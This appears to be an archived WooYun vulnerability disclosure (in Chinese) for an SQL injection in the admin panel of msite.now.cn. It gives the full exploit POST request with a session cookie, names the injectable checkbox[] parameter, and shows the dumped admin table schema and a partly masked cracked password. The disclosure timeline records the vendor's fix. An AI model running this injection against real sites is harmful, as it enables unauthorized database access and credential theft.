乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-16: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商就不能给的高点rank哈??
站点http://msite.now.cn/
POST /admin.php/themes/opt HTTP/1.1Content-Length: 74Content-Type: application/x-www-form-urlencodedReferer: msite.now.cnCookie: ci_session=hQK56MKzhpj%2BX6HusFvof2tza75uUrQnnbZUBf%2B8714zwSlXEVOpgNRMqk3uEPPMLANwP0k20Xol9Po1Sg4bx9kga7LVHgK4xxoQ7RkfbwCdf%2F7VR9hVRveBHMXyQT%2FvbGgj7RcTQO%2FYumwWpKRN61fpXWreO498lXyphAgMkhZBmU9nqcBBZoWy3j8kFqDXh83ak0gOFu26SDQ0N549Au18FM0BdXN9iRmOoMiGhz%2FOPh4U9jkIJ%2BeYObuXR3laKymygSNVhXZA6YpxRynD5ajNuJrfT1szP9wZ3mRWA%2F1fRy5n2QC8rOwd3amfgkWjht%2FwrHJtfg2ddVWJaPPRj784zSz9FebO7uwwLvruxvANC%2B0%2FNp6%2FnxPurp6BZrrrrK%2FoEU6P482z%2FApxMYMAsnsHn0DuNHyap8bNSMuEVzHVXM%2F3VpAPEhuspIH%2BdbQBq1VIjtfQjTvynyU6vh2BHA%3D%3D4a5c2c5f845f0845816ca5108d2db8a9a2e071c3Host: msite.now.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*action=del_all&checkbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c
参数checkbox[]可注射
Database: webphone_centerTable: wp_admin[8 columns]+-------------+----------------------+| Column | Type |+-------------+----------------------+| action_list | text || add_time | int(11) || email | varchar(60) || last_ip | varchar(15) || last_login | int(11) || password | varchar(32) || user_id | smallint(5) unsigned || user_name | varchar(60) |+-------------+----------------------+
*****--------------+-********** | **********--------------+-**********2ad5e84fc29ff99 | **********--------------+-*****
解密后密码为
*****te*****
危害等级:高
漏洞Rank:10
确认时间:2015-08-19 17:30
谢谢提供的漏洞信息!
2015-09-16:已修复